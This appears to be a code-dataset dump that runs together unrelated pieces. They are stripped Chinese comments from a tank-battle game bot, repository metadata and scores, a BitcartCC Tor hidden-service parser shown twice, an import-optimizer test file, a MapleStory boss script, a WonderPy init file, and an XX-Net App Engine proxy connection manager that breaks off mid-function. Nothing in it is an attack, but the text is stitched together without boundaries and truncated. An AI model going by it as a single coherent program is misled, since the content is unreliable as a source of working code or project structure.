于是,随后就会遇到二对一且三方均没有炮弹 # 如果对方下回合不走,那么二打一直接干掉 # 如果对方下回合移动,那么攻击的队友就解除了威胁,可以继续前进 # #{ END 'decision/team/break_brick.py' }# #{ BEGIN 'decision/team/back_to_help.py' }# 考虑一种墙后后退的逻辑 5cea650cd2337e01c7ad8de4 这样可以制造二打一的局面 TODO: 回退后可能会造成 WITHDRAW 的情况出现 ? # 保持对射行为, # TODO: # 或许可以考虑用 对射状态描述撤退状态下的对射? # 5cee87fc641dd10fdcc91b44 为何空指针 ??? # 当前和我墙后僵持的敌人的队友 # 应该不会这样? #{ END 'decision/team/back_to_help.py' }# #{ BEGIN 'decision/team/prevent_team_hurt.py' }# 防止队员自残 -------------- 在决策链的最后,判断是否出现队友恰好打掉准备移动的队友的情况,并加以协调 # 有队友已经挂了,没必要考虑这个情况 # 刚好把队友打死 ... # # TODO: # 如何决策? # 改动射击和决策都有可能很危险 # # # 这里先做一个特殊情况,那就是重叠攻击基地,这种情况将移动的队友视为不移动 # # TODO: # 好吧,这种情况和主动和队友打破重叠的行为是相斥的 ... # if (moveBattler.xy == shootBattler.xy and moveBattler.is_face_to_enemy_base(ignore_brick=False) and shootBattler.is_face_to_enemy_base(ignore_brick=False) ): returnActions[movePlayer.id] = Action.STAY hasTeamActions[movePlayer.id] = True # # 先判断这种情况 5ce92f70d2337e01c7abf587 #----------------- # # 默认让射击队友停下 #-------------------- # # 以下情况,应该让 moveBattler 停下来 # # 1. 射击队友正在和敌人对射 # 2. 射击队员正面向敌人基地(为了触发团队协作) # # 其他更有待补充 ... # #{ END 'decision/team/prevent_team_hurt.py' }# #{ BEGIN 'decision/team/cut_through_midline.py' }# 当我方队员与敌人在墙后僵持,并且不得不选择等待的时候 考虑是否可以打通土墙,因为这个时候也许可以干扰另一路敌人的进攻路线 # # 保守起见,先等待一回合 # # TODO: # 有可能延误战机! 5ced7ce1641dd10fdcc776b1 # 这样才是对的 5ced7d66641dd10fdcc777ae # # if not player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1): # continue # 当前回合处于等待状态 # 墙后有人造成的 # 因此等待行军 # 必须要能够射击 # 只有中线附近的队友才会触发这个攻击条件 # 实际考虑的是它的队员! # 对方已经输了,就不用管了 ... # 将会打掉一个砖块 # # 首先判断这一步射击是否会阻止敌人的移动 # # 敌人下回合打算行军,但是受到我方坦克的影响而停止 # 那就算了 # # 判断是否摧毁了敌人进攻路线上的块 # # 首先判断这个块是否和当前坦克处在不同测的地图上 # _dx == 0 表示 x = 4 中线的墙可以打掉 # 不要打掉这个块? # # 防止出现我方坦克打掉一个块,对方可以突然出现在 field 前 # # 好吧,还是要判断一下这种情况的 ... # # 现在说明可以射击 # #{ END 'decision/team/cut_through_midline.py' }# #{ BEGIN 'decision/team/cooperative_attack.py' }# 团队合作拆家策略 ----------------- 案例 ------------ 1. 5ceacbd0811959055e22139d 需要预判 1 步 -> 5cec07f30df42d28e72de8d8 2. 
5ce8db66d2337e01c7ab9fae 需要预判 3 步 -> 5cec1a324742030582fad728 3. 5cec9157641dd10fdcc5f30d 重叠进攻时能够分开射击了 4. 5cec9a19641dd10fdcc5ff9f case 3 的另一种实现,提前找到合作路线 5. 5cec9c10641dd10fdcc60254 case 2 的另一种实现 6. 5cec9d01641dd10fdcc6045a 合作与不合作路线相同,但是选择了合作 7. 5cec9d7f641dd10fdcc60556 8. 5ceca04d641dd10fdcc60aed case 2 的另一种实现,但是路线更短,因为将合作触发条件放宽到非严格过中线! 9. 5ceca0ab641dd10fdcc60bb6 将合作条件放宽到非严格过中线可以触发的合作拆家 10. 5ceca21b641dd10fdcc60d4d 11. 5ceca3c3641dd10fdcc61071 12. 5ceca80d641dd10fdcc617e9 13. 5cecabbd641dd10fdcc61d34 14. 5cecfa94641dd10fdcc69661 触发前提 -------------- 在双方均到达对方基地的前提下,假定双方坦克不会再发生交火。在这种情况下,可以认为找到的 最短路线即为实际可走的、不受敌方影响的最短路线。那么可以进行团队合作,寻找一条两人合作下 距离更加短的进攻路线 实现方法 -------------- 下面给出一种简单的实现方法(只预判一回合,更加复杂的情况尚未能实现) 这个策略中存在主攻队员和辅助队员的角色划分。这个并不能在一开始就得出定论,而是要通过判断。 首先,合作拆家所希望达到的效果是,辅助队员帮助主攻队员清除其路线上的土墙,从而减短主攻队员的 攻击路线长度。每清除掉一个土墙,能够减少的路径长度为 2 因此,首先在 delay = 1 的限制条件下,找到其中一个进攻队员所有可能的最短路线。 delay = 1 是允许的, 因为一个土墙的权重是 2 ,打掉 delay = 1 的路线上的一个土墙,可以得到比 delay = 0 的最短路线更加短的路线。 然后考虑另一个进攻队员当前回合所有可能的攻击行为。找到这些攻击行为下能够摧毁掉的 fields ,如果恰好是 位于另一队员攻击路线上的土墙,那么就找到了一条双人合作下的更短路线。 依照上述方法,可以列举出所有可能的最短路线。对这些路线长度进行排序以找到最短的路线,即为团队合作下更优 的一种拆家路线。 补充的更复杂实现 ----------------- 有的时候会出现两个队友攻击路线相同且刚好互相不会影响 5ce8db66d2337e01c7ab9fae ,这种情况下实际上仍然 有机会产生团队合作,但是需要预判 3 步,第一步首先考虑所有可能的进攻行为,第二步按照正常的进攻方向,第三步 再尝试寻找团队更优路线,如果此时可以找到团队合作路线,那么当前回合就先采用第一步的进攻行为。第二步照常进攻 到了第三步的时候就会被上面那种单回合的合作拆家决策找到合作路线。 特判情况 ----------- 1. 考虑这样一种情况,当前两个队友进攻路线长度相同,两者下一步同时攻击一个块,假如让其中一个坦克停止攻击 在下回合可以得到更加短的进攻路线,那么就让这个队员暂时停下来。这种情况通常对应着最后拆基地的几步,一个队员 暂时停下来,让另一个队员拆到前面的墙,然后他下回合马上可以打掉基地,最短路线长度是 2 , 如果双方此时是同时开火的,那么最短路线长度是 3 2. 
假设一个队友这回合打掉墙,另一个队友下回合可以到达这个队友身后,下回合前面的队友闪避,后面的队友射击, 那么最短路线长度是 2 ,如果此时前一个队员等待一回合,后面的队员将无法射击,那么最短路线长度将是 3 # 优先中路搜索 # 优先 x-轴优先搜索 给定 attackingPlayer 和 assistantPlayer ,尝试寻找一种最短的进攻路线 如果有个可行的方案,那么只返回找到的第一个 Return: - solution (attackingPlayer, route, realAction, assistantPlayer, shootAction) / None # 拆到了一个队友进攻路线上的土墙 # # 首先考虑打掉的是不是同一个块 # # 打掉同一个块的情况下,当且仅当攻击方已经面向对方基地时有效,否则起不到增加长度的效果 # # 打掉的是同一个块 # 只有当攻击方面对对方基地时,才能起到减少路线长度的效果 # 否则可以让攻击方这回合等待 # 找不到,返回 None # 不是两个人就不需要考虑合作了 # 两者必须同时在对方基地,并且是严格的不包含中线 # # 条件放宽了,现在允许包含中线 5cec9e9d641dd10fdcc60783 # # 不可以拥有和敌人遭遇战斗相关的状态 # # 不需要判断是否具有团队信号? # # 事实上他碰巧提供了一个很好的案例 5cec9157641dd10fdcc5f30d # 最后一步的时候由于覆盖了 READY_TO_LEAVE_TEAMMATE 的团队策略,使得最后一步合作得以顺利实现! # # -> [ (attackingPlayer, route, realAction, assistantPlayer, shootAction) ] # 当前回合不能进攻,那就无法发起协助了 ... # # 攻击方进攻路线长度比辅助方长 2 步以上,那么直接跳过 #-------------------------------------------------------- # 因为单回合决策下至多可以让一个队员的路线长度减 2,如果进攻方比辅助方的攻击路线长 2 步以上,那么 # 一回合内无论如何都不可能让进攻方的路线长度短于辅助方当前回合的最短路线长度,在这种情况下即使可以 # 发生合作,也是没有意义的,甚至可能拖延辅助方的进攻节奏(但是并不能排除可以多回合帮助,然而这个情况 # 非常复杂,所以在此不考虑了) # # # 现在往后模拟两回合 5ce8db66d2337e01c7ab9fae # # 第一步随便攻击,第二步按照正常的攻击方向,第三步看是否有合适的攻击路线 # # 缓存已经尝试过的第一步两个方向 # 攻击方第一步允许 delay = 1 ## 模拟两步 ## # 模拟两步找到路线 ## 模拟三步 ## # 模拟三步找到路线 #{ END 'decision/team/cooperative_attack.py' }# #{ BEGIN 'decision/team/dummy_ending.py' }# 用于结束 DecisionChain 的结尾 返回 True ,这样 DecisionChain 就会结束 将 player 缓存的结果直接返回 #{ END 'decision/team/dummy_ending.py' }# #{ BEGIN 'player.py' }# # 不能处理的情况,返回 Action.INVALID #------------------------------------ # 值得注意的是,由于 Player 仅仅被 team 判断,signal 仅用于玩家与团队间交流,因此团队在判断时, # 不考虑玩家返回的信号,尽管玩家实际返回的值是 (action, signal) # # { (side, id): instance } 以 (side, id) 为主键,缓存已经创建过的玩家类,使之为 Singleton Input: - tank TankField/BattleTank 第一次必须是 TankField ,之后随意 - map Tank2Map # 只要有这两个属性就可以 # 使用自定义初始化条件初始化 # Tank2Team # Tank2Player # [Tank2Player, Tank2Player] # 当前回合的状态,可以有多个,每回合情况 # 对手给我做的标记,标记后长期有效 # 缓存引起潜在风险的敌人 BattleTank # 缓存这回合的攻击路线。这个属性加入较早,只缓存了 marching 逻辑下的路线 # 缓存决策结果,注:每调用一次 make_decision 就会自动修改一次这个结果 
# 缓存团队策略 用于管理 player 还原点的创建、选择回滚等行为 --------------------------------------------- 可以为 player 在决策过程中产生的临时变量创建快照,如果在此后又进行了重新决策,但是又不想让这个 决策修改之前决策时留下的临时变量,那么就可以在新的决策前先通过这个类创建一个快照,结束后再通过快照 进行回滚。 关于还原点的创建 ---------------- 1. 对于可能被修改地址指向内存的属性,需要创建一个深拷贝,例如 set, list 类型的属性 2. 对于只是储存引用的属性,那么此处只需要复制引用。这对于采用单例模式设计的类的实例来说是必须的 3. 对于不可变对象,只需进行简单的值复制 # 是否废弃当前快照,让 player 的状态永久改变 创建一个快照 由于决策时可能还会更改敌人的状态,所以实际上是给所有人创建快照 # (side, id) -> attributes # 创建深拷贝 # 复制值 # 复制引用 恢复到还原点的状态 # 保存更改的情况下,不再回滚 是否丢弃当前 snapshot,保存变更。 之后如果再调用 restrore,将不会当前 snapshot 还原 player 的状态 # singleton ! # -> Tank2Player # -> [Tank2Player, Tank2Player] 创建一个还原点,然后该 player 进行决策,决策完成后回滚 # 可以选择不接 snapshot # -> Tank2Player # -> [Tank2Player] 引起预期行为被拒的敌人,因为该敌人有可能在我方采用预期行为的下一回合将我方击杀 # -> BattleTank # 确保为 BattleTank 对象 # 返回最后一次决策的结果,用于队员间交流 # 用于团队设置队员的当前决策 # 获得当前的团队决策 # 用于团队设置队员的团队决策 # 添加一个或多个状态 # 删除一个或多个状态 # remove_if_exists # 清除所有状态 # 是否存在某种状态 # 添加一个或多个标记 # 是否存在某个标记 # 删除一个活多个标记 # 清楚全部标记 评估该这个决策是否安全 Return: - issafe bool 安全 # 先检查是否为有效行为 # 移动情况下有一种可能的风险 #-------------------------- # 1. 需要考虑移动后恰好被对方打中 # 2. 移动后恰好遇到两个敌人,假设当前回合敌人不动 # ------------------------- # 对手本回合无法射击,则不必担心 # 提交地图模拟情况 # 移动后遇到两个敌人 # 并且两个敌人不在同一直线上 # 随便设置一个? # 移动后可能会被敌人打中 # 射击情况下有两种可能的危险 #-------------------------- # 1. 打破一堵墙,然后敌人在后面等着 # 注意区分两个敌人的情况! 5ce92ed6d2337e01c7abf544 # 2. 身边没有闪避的机会,打破一堵墙,对方刚好从旁路闪出来 # 3. 打到队友! 5ce90c6dd2337e01c7abce7a #--------------------------- # 打到队友当然不安全! # 模拟本方行为 # # TODO: # 只模拟一个坦克的行为并不能反映真实的世界,因为敌方这回合很有可能射击 # 那么下回合它就无法射击,就不应该造成威胁 # # 任意移动行为 # 模拟敌方行为 # 对方下一步不可能移动到我即将摧毁的 field 上,所以这种情况是安全的 # 敌方原地不动或移动一步后,能够看到该坦克 # 还可以尝试回避 # 无法回避,危险行为 # 默认安全? 用这个函数提交决策 如果这个决策被判定是危险的,那么将提交 instead 行为 下回合接近某个敌人是否安全? --------------------------- 用于双方相遇 (且敌人无法射击),我方试图接近他的时候 这种情况下需要判断周围是否有敌人攻击我 # 可以射击,必定不安全,还是检查一下 # 找到另一个敌人 # 输了就不算 # 排除目前这个敌人 # 本回合不能攻击的不算 # 开始模拟,反正就一架坦克 # 我方坦克将出现在它旁边,并且它可以射击 # 可能被偷袭 # 此处判断不会被偷袭 # 不能移动,当然不安全 ... 
在不考虑和自己重叠的敌人的情况下,判断采用移动的方法打破重叠是否安全 此时将敌人视为不会攻击,然后考虑另一个敌人的攻击 # 还是检查一下,不要出错 # 如果移动后有两个敌人在旁边,那么不能前进 5cd3e7a786d50d05a0082a5d #------------------------------------------- #self._riskyEnemy = ?? # 跳过已经输了的 # 另一个对手不能射击 # 不考虑和自己重叠的这个坦克 # 提交模拟 # 不安全,可能有风险 # 否则是安全的 当两者均没有炮弹,然后中间相差一格时,冲上去和敌方坦克重叠是否合适? WARNING: ------------ 1. 该函数仅适用于两者间移动路劲长度为 2 的情况,其他情况不适用 2. 该函数判定为 False 的情况,表示适合堵路,不适合重叠,但是判定为 False 并不表示一定要冲上去重叠,而是要根据当时的具体情况来判断 # # 检查自己所处的位置是否是敌人必经之路 # 如果是,那么就堵路 # # 将我方坦克设为 Steel # 不大可能,但是检查一下 # 直接就走不通了,当然非常好啦 # 认为需要多打破一个以上土墙的情况叫做原路 # @override 预处理: ------------------ - 清除所有旧有状态 - 清除可能的风险敌人 - 统一处理回复格式 注意: ------------------ - 申明为 _make_decision 过程中的缓存变量,必须在下一次决策前预先清除 # 先清除所有的状态 # 清楚所有缓存的风险敌人 # 说明没有回复团队信号 # 缓存决策 # 先保持着 这个状态 #{ END 'player.py' }# #{ BEGIN 'team.py' }# # 实际上不可能碰到 team 不能决策的情况,否则找谁决策呀 ... # 团队记忆 # 历史行为 botzone 将 data 传入给 team 恢复记忆 # [ set(), set() ] 每轮的状态 # [ set(), set() ] 已有的标记 # [ Route, Route ] 由 botzone input 获得的过去动作,可以将其视为一种记忆 设置对手团队 Input: - team Tank2Team 在曾经的一定回合里,某玩家是否拥有某个状态 Input: - player Player 玩家实例,不一定是本队的 - status int 状态编号 - turns int 向前检查多少回合 # TODO: # 还需要判断回合数是否超出一已知回合? 
# 逆序 # 可能 allStatus 为空 最近的几回合内是否曾经拥有过某个状态 获得一个玩家的操纵坦克的历史行为 Input: - player Player 玩家实例,不一定是本队的 - back int ( >= 1) 前第几回合的历史记录,例如 back = 1 表示前一回合 团队决策 Return: - actions [int, int] 0, 1 号玩家的决策 # 假装先让对方以自己的想法决策 #------------------------------- # 分析对方的行为,可以对下一步的行为作出指导 # # for func in [ find_all_routes_for_shoot, find_all_routes_for_move ]: # if not hasattr(func, "__wrapped__"): # continue # _wrapper = func.__wrapped__ # if hasattr(_wrapper, "__memory__"): # _memory = _wrapper.__memory__ # debug_print(_memory.keys(), len(_memory)) # debug_print(sys.getsizeof(_memory)) # @override 如果有的玩家无法决策,那么就将其行为设为 Action.STAY 事实上这种情况是不应该出现的,但是为了防止出错,此处对决策结果进行检查 #{ END 'team.py' }# #{ BEGIN 'stream.py' }# #{ END 'stream.py' }# #{ BEGIN 'botzone.py' }# # 对方的决策 # 己方的决策 解析输入信息 Input: - stream TextIOWrapper 输入流对象,必须实现 read 方法 输出结果 Input: - stream TextIOWrapper 输出流对象,必须实现 write 方法 - response dict Bot 此回合的输出信息 - debug dict/str 调试信息,将被写入log,最大长度为1KB - data dict Bot 此回合的保存信息,将在下回合输入 - globaldata dict Bot 的全局保存信息,将会在下回合输入, 对局结束后也会保留,下次对局可以继续利用 # 由 requests, responses 解析而来的历史动作记录 解析 requests 中存在有某种类型 field 的坐标 Input: - binary list 某种类型 field 的 binary 标记 Yield: - (x, y) tuple(int, int) 这个坐标上存在该类型 field # 带 header # 此时 header 被去掉 # { (side, id): [Action] } 获得某一坦克的历史决策 # 没有记录则抛出 [] #{ END 'botzone.py' }# #{ BEGIN 'main.py' }# # Singleton # Singleton # 这个模式下 map 对象会复用,首先需要重置 #{ END 'main.py' }#
2.000118
2
api/ext/tor.py
MrNaif2018/bitcart
48
6628981
import ipaddress import json import os from dataclasses import asdict as dataclass_asdict from dataclasses import dataclass from typing import Optional from api import settings, utils from api.logger import get_logger logger = get_logger(__name__) REDIS_KEY = "bitcartcc_tor_ext" @dataclass(frozen=True) class PortDefinition: virtual_port: int ip: str port: int @dataclass class HiddenService: name: str directory: str hostname: str port_definition: Optional[PortDefinition] = None def is_onion(host): return host.lower().endswith(".onion") def parse_hidden_service(line): if not line.startswith("HiddenServiceDir "): return parts = line.split() if len(parts) != 2: return return parts[1].strip() def parse_hidden_service_port(line): if not line.startswith("HiddenServicePort "): return parts = line.split() if len(parts) != 3: return try: virtual_port = int(parts[1].strip()) address_port = parts[2].strip().split(":") if len(address_port) != 2: return port = int(address_port[1]) ip_address = str(ipaddress.ip_address(address_port[0].strip())) return PortDefinition(virtual_port, ip_address, port) except ValueError: return # all parsing exceptions are ValueError def get_hostname(service_dir, log=True): path = os.path.join(service_dir, "hostname") try: with open(path) as f: return f"http://{f.readline().strip()}" except OSError: if log: logger.warning(f"Hostname file missing for service {get_service_name(service_dir)}") return def get_service_name(service_dir): return os.path.basename(service_dir).replace("-", " ") def parse_torrc(torrc, log=True): if not torrc: return [] try: with open(torrc) as f: lines = f.readlines() except OSError: if log: logger.warning("Torrc file not found") return [] services = [] for line in lines: line = line.strip() hidden_service = parse_hidden_service(line) hidden_service_port = parse_hidden_service_port(line) if hidden_service: hidden_service = HiddenService( get_service_name(hidden_service), hidden_service, get_hostname(hidden_service, log=log), ) 
services.append(hidden_service) elif hidden_service_port and services: services[-1].port_definition = hidden_service_port return services async def refresh(log=True): # pragma: no cover: used in production only async with utils.redis.wait_for_redis(): services = parse_torrc(settings.settings.torrc_file, log=log) services_dict = {service.name: dataclass_asdict(service) for service in services} anonymous_services_dict = {service.name: {"name": service.name, "hostname": service.hostname} for service in services} onion_host = services_dict.get("BitcartCC Merchants API", "") if onion_host: onion_host = onion_host["hostname"] or "" await settings.settings.redis_pool.hset( REDIS_KEY, mapping={ "onion_host": onion_host, "services_dict": json.dumps(services_dict), "anonymous_services_dict": json.dumps(anonymous_services_dict), }, ) async def get_data(key, default=None, json_decode=False): async with utils.redis.wait_for_redis(): data = await settings.settings.redis_pool.hget(REDIS_KEY, key) data = json.loads(data) if json_decode and data else data return data if data else default
import ipaddress import json import os from dataclasses import asdict as dataclass_asdict from dataclasses import dataclass from typing import Optional from api import settings, utils from api.logger import get_logger logger = get_logger(__name__) REDIS_KEY = "bitcartcc_tor_ext" @dataclass(frozen=True) class PortDefinition: virtual_port: int ip: str port: int @dataclass class HiddenService: name: str directory: str hostname: str port_definition: Optional[PortDefinition] = None def is_onion(host): return host.lower().endswith(".onion") def parse_hidden_service(line): if not line.startswith("HiddenServiceDir "): return parts = line.split() if len(parts) != 2: return return parts[1].strip() def parse_hidden_service_port(line): if not line.startswith("HiddenServicePort "): return parts = line.split() if len(parts) != 3: return try: virtual_port = int(parts[1].strip()) address_port = parts[2].strip().split(":") if len(address_port) != 2: return port = int(address_port[1]) ip_address = str(ipaddress.ip_address(address_port[0].strip())) return PortDefinition(virtual_port, ip_address, port) except ValueError: return # all parsing exceptions are ValueError def get_hostname(service_dir, log=True): path = os.path.join(service_dir, "hostname") try: with open(path) as f: return f"http://{f.readline().strip()}" except OSError: if log: logger.warning(f"Hostname file missing for service {get_service_name(service_dir)}") return def get_service_name(service_dir): return os.path.basename(service_dir).replace("-", " ") def parse_torrc(torrc, log=True): if not torrc: return [] try: with open(torrc) as f: lines = f.readlines() except OSError: if log: logger.warning("Torrc file not found") return [] services = [] for line in lines: line = line.strip() hidden_service = parse_hidden_service(line) hidden_service_port = parse_hidden_service_port(line) if hidden_service: hidden_service = HiddenService( get_service_name(hidden_service), hidden_service, get_hostname(hidden_service, log=log), ) 
services.append(hidden_service) elif hidden_service_port and services: services[-1].port_definition = hidden_service_port return services async def refresh(log=True): # pragma: no cover: used in production only async with utils.redis.wait_for_redis(): services = parse_torrc(settings.settings.torrc_file, log=log) services_dict = {service.name: dataclass_asdict(service) for service in services} anonymous_services_dict = {service.name: {"name": service.name, "hostname": service.hostname} for service in services} onion_host = services_dict.get("BitcartCC Merchants API", "") if onion_host: onion_host = onion_host["hostname"] or "" await settings.settings.redis_pool.hset( REDIS_KEY, mapping={ "onion_host": onion_host, "services_dict": json.dumps(services_dict), "anonymous_services_dict": json.dumps(anonymous_services_dict), }, ) async def get_data(key, default=None, json_decode=False): async with utils.redis.wait_for_redis(): data = await settings.settings.redis_pool.hget(REDIS_KEY, key) data = json.loads(data) if json_decode and data else data return data if data else default
en
0.743497
# all parsing exceptions are ValueError # pragma: no cover: used in production only
2.448224
2
python/testData/optimizeImports/commentsInsideParenthesesInCombinedFromImports.py
jnthn/intellij-community
2
6628982
<gh_stars>1-10 from datetime import (timedelta as name, # bcc time as bbb) # cbc from datetime import (datetime as ccc) # abc print(name, bbb, ccc)
from datetime import (timedelta as name, # bcc time as bbb) # cbc from datetime import (datetime as ccc) # abc print(name, bbb, ccc)
en
0.763149
# bcc # cbc # abc
2.06236
2
scripts/field/first_DemianNormal1.py
Snewmy/swordie
9
6628983
<gh_stars>1-10 from net.swordie.ms.constants import BossConstants from net.swordie.ms.life.mob.boss.demian import Demian from net.swordie.ms.connection.packet import DemianFieldPacket from net.swordie.ms.life.mob.boss.demian.sword import DemianFlyingSword from net.swordie.ms.connection.packet import FieldPacket field = chr.getField() instance = chr.getInstance() init = instance.initialised if not init: instance.initialised = True mob = sm.spawnMob(BossConstants.DEMIAN_NORMAL_TEMPLATE_ID, 895, 16, False, BossConstants.DEMIAN_HP) # spawn Demian sm.addEvent(Demian.stigmaIncinerateObjectTimer(field)) # start Pillar sword = DemianFlyingSword.createDemianFlyingSword(chr, mob) field.spawnLife(sword, None) # create sword.startPath() sword.target() for iChr in instance.getChars(): iSM = iChr.getScriptManager() iChr.write(FieldPacket.giveSpecialSkillBar(BossConstants.BRAND_OF_SACRIFICE)) iChr.write(DemianFieldPacket.corruptionChange(False, 0)) # show corruption window iSM.addEvent(Demian.increaseStigmaPassiveTimer(iChr)) # start stigma timer on corruption window while sm.hasMobsInField(): sm.waitForMobDeath() sm.warp(350160240)
from net.swordie.ms.constants import BossConstants from net.swordie.ms.life.mob.boss.demian import Demian from net.swordie.ms.connection.packet import DemianFieldPacket from net.swordie.ms.life.mob.boss.demian.sword import DemianFlyingSword from net.swordie.ms.connection.packet import FieldPacket field = chr.getField() instance = chr.getInstance() init = instance.initialised if not init: instance.initialised = True mob = sm.spawnMob(BossConstants.DEMIAN_NORMAL_TEMPLATE_ID, 895, 16, False, BossConstants.DEMIAN_HP) # spawn Demian sm.addEvent(Demian.stigmaIncinerateObjectTimer(field)) # start Pillar sword = DemianFlyingSword.createDemianFlyingSword(chr, mob) field.spawnLife(sword, None) # create sword.startPath() sword.target() for iChr in instance.getChars(): iSM = iChr.getScriptManager() iChr.write(FieldPacket.giveSpecialSkillBar(BossConstants.BRAND_OF_SACRIFICE)) iChr.write(DemianFieldPacket.corruptionChange(False, 0)) # show corruption window iSM.addEvent(Demian.increaseStigmaPassiveTimer(iChr)) # start stigma timer on corruption window while sm.hasMobsInField(): sm.waitForMobDeath() sm.warp(350160240)
en
0.619358
# spawn Demian # start Pillar # create # show corruption window # start stigma timer on corruption window
2.006403
2
WonderPy/__init__.py
avrabe/WonderPy
1
6628984
<reponame>avrabe/WonderPy from . import components # noqa from . import core # noqa from . import util # noqa
from . import components # noqa from . import core # noqa from . import util # noqa
uz
0.446344
# noqa # noqa # noqa
1.026277
1
gae_proxy/local/connect_manager.py
vanish87/XX-Net
1
6628985
#!/usr/bin/env python # coding:utf-8 import os import binascii import time import socket import struct import threading import operator import httplib import socks from xlog import getLogger xlog = getLogger("gae_proxy") current_path = os.path.dirname(os.path.abspath(__file__)) import OpenSSL SSLError = OpenSSL.SSL.WantReadError from config import config def load_proxy_config(): if config.PROXY_ENABLE: if config.PROXY_TYPE == "HTTP": proxy_type = socks.HTTP elif config.PROXY_TYPE == "SOCKS4": proxy_type = socks.SOCKS4 elif config.PROXY_TYPE == "SOCKS5": proxy_type = socks.SOCKS5 else: xlog.error("proxy type %s unknown, disable proxy", config.PROXY_TYPE) config.PROXY_ENABLE = 0 return socks.set_default_proxy(proxy_type, config.PROXY_HOST, config.PROXY_PORT, config.PROXY_USER, config.PROXY_PASSWD) load_proxy_config() from google_ip import google_ip from appids_manager import appid_manager from openssl_wrap import SSLConnection NetWorkIOError = (socket.error, SSLError, OpenSSL.SSL.Error, OSError) g_cacertfile = os.path.join(current_path, "cacert.pem") import connect_control class Connect_pool(): def __init__(self): self.pool_lock = threading.Lock() self.not_empty = threading.Condition(self.pool_lock) self.pool = {} def qsize(self): return len(self.pool) def put(self, item): handshake_time, sock = item self.not_empty.acquire() try: self.pool[sock] = handshake_time self.not_empty.notify() finally: self.not_empty.release() def get(self, block=True, timeout=None): self.not_empty.acquire() try: if not block: if not self.qsize(): return None elif timeout is None: while not self.qsize(): self.not_empty.wait() elif timeout < 0: raise ValueError("'timeout' must be a positive number") else: end_time = time.time() + timeout while not self.qsize(): remaining = end_time - time.time() if remaining <= 0.0: return None self.not_empty.wait(remaining) item = self._get() return item finally: self.not_empty.release() def get_nowait(self): return self.get(block=False) def _get(self): 
fastest_time = 9999 fastest_sock = None for sock in self.pool: ip = sock.ip #if not google_ip.is_traffic_quota_allow(ip): # continue time = self.pool[sock] if time < fastest_time or not fastest_sock: fastest_time = time fastest_sock = sock self.pool.pop(fastest_sock) return (fastest_time, fastest_sock) def get_slowest(self): self.not_empty.acquire() try: if not self.qsize(): raise ValueError("no item") slowest_handshake_time = 0 slowest_sock = None for sock in self.pool: handshake_time = self.pool[sock] if handshake_time > slowest_handshake_time: slowest_handshake_time = handshake_time slowest_sock = sock self.pool.pop(slowest_sock) return (slowest_handshake_time, slowest_sock) finally: self.not_empty.release() def get_need_keep_alive(self, maxtime=200): return_list = [] self.pool_lock.acquire() try: pool = tuple(self.pool) for sock in pool: inactive_time = time.time() -sock.last_use_time #logging.debug("inactive_time:%d", inactive_time * 1000) if inactive_time >= maxtime: return_list.append(sock) del self.pool[sock] return return_list finally: self.pool_lock.release() def clear(self): self.pool_lock.acquire() try: for sock in self.pool: sock.close() self.pool = {} finally: self.pool_lock.release() def to_string(self): str = '' self.pool_lock.acquire() try: pool = sorted(self.pool.items(), key=operator.itemgetter(1)) i = 0 for item in pool: sock,t = item str += "%d \t %s handshake:%d not_active_time:%d\r\n" % (i, sock.ip, t, time.time() -sock.last_use_time) i += 1 finally: self.pool_lock.release() return str class Https_connection_manager(object): thread_num_lock = threading.Lock() def __init__(self): # http://docs.python.org/dev/library/ssl.html # http://blog.ivanristic.com/2009/07/examples-of-the-information-collected-from-ssl-handshakes.html # http://src.chromium.org/svn/trunk/src/net/third_party/nss/ssl/sslenum.c # openssl s_server -accept 443 -key CA.crt -cert CA.crt # ref: http://vincent.bernat.im/en/blog/2011-ssl-session-reuse-rfc5077.html 
self.openssl_context = SSLConnection.context_builder(ca_certs=g_cacertfile) self.openssl_context.set_session_id(binascii.b2a_hex(os.urandom(10))) if hasattr(OpenSSL.SSL, 'SESS_CACHE_BOTH'): self.openssl_context.set_session_cache_mode(OpenSSL.SSL.SESS_CACHE_BOTH) self.timeout = 4 self.max_timeout = 15 self.thread_num = 0 self.load_config() if self.keep_alive: p = threading.Thread(target = self.keep_alive_thread) p.daemon = True p.start() p = threading.Thread(target = self.create_connection_daemon) p.daemon = True p.start() def load_config(self): self.max_thread_num = config.CONFIG.getint("connect_manager", "https_max_connect_thread") self.connection_pool_max_num = config.CONFIG.getint("connect_manager", "https_connection_pool_max") self.connection_pool_min_num = config.CONFIG.getint("connect_manager", "https_connection_pool_min") self.keep_alive = config.CONFIG.getint("connect_manager", "https_keep_alive") self.new_conn_pool = Connect_pool() self.gae_conn_pool = Connect_pool() self.host_conn_pool = {} def clean_old_connection(self): self.gae_conn_pool.clear() def head_request(self, ssl_sock): if ssl_sock.host == '': ssl_sock.appid = appid_manager.get_appid() if not ssl_sock.appid: xlog.error("no appid can use") return False host = ssl_sock.appid + ".appspot.com" ssl_sock.host = host else: host = ssl_sock.host # public appid don't keep alive, for quota limit. 
if ssl_sock.appid.startswith("xxnet-") and ssl_sock.appid[7:].isdigit(): #logging.info("public appid don't keep alive") #self.keep_alive = 0 return False #logging.debug("head request %s", host) request_data = 'HEAD /_gh/ HTTP/1.1\r\nHost: %s\r\n\r\n' % host response = None try: ssl_sock.settimeout(10) ssl_sock._sock.settimeout(10) data = request_data.encode() ret = ssl_sock.send(data) if ret != len(data): xlog.warn("head send len:%d %d", ret, len(data)) response = httplib.HTTPResponse(ssl_sock, buffering=True) response.begin() status = response.status if status != 200: xlog.debug("app head fail status:%d", status) raise Exception("app check fail %r" % status) return True except httplib.BadStatusLine as e: inactive_time = time.time() - ssl_sock.last_use_time xlog.debug("%s keep alive fail, time:%d", ssl_sock.ip, inactive_time) return False except Exception as e: xlog.warn("%s head %s request fail:%r", ssl_sock.ip, ssl_sock.appid, e) return False finally: if response: response.close() def keep_alive_worker(self, sock): call_time = time.time() if self.head_request(sock): self.save_ssl_connection_for_reuse(sock, call_time=call_time) else: google_ip.report_connect_closed(sock.ip, "HEAD") sock.close() #self.create_more_connection() def start_keep_alive(self, sock): work_thread = threading.Thread(target=self.keep_alive_worker, args=(sock,)) work_thread.start() def keep_alive_thread(self): while self.keep_alive and connect_control.keep_running: if not connect_control.is_active(): time.sleep(1) continue new_list = self.new_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) old_list = self.gae_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) to_keep_live_list = new_list + old_list for ssl_sock in to_keep_live_list: inactive_time = time.time() - ssl_sock.last_use_time if inactive_time > self.keep_alive: 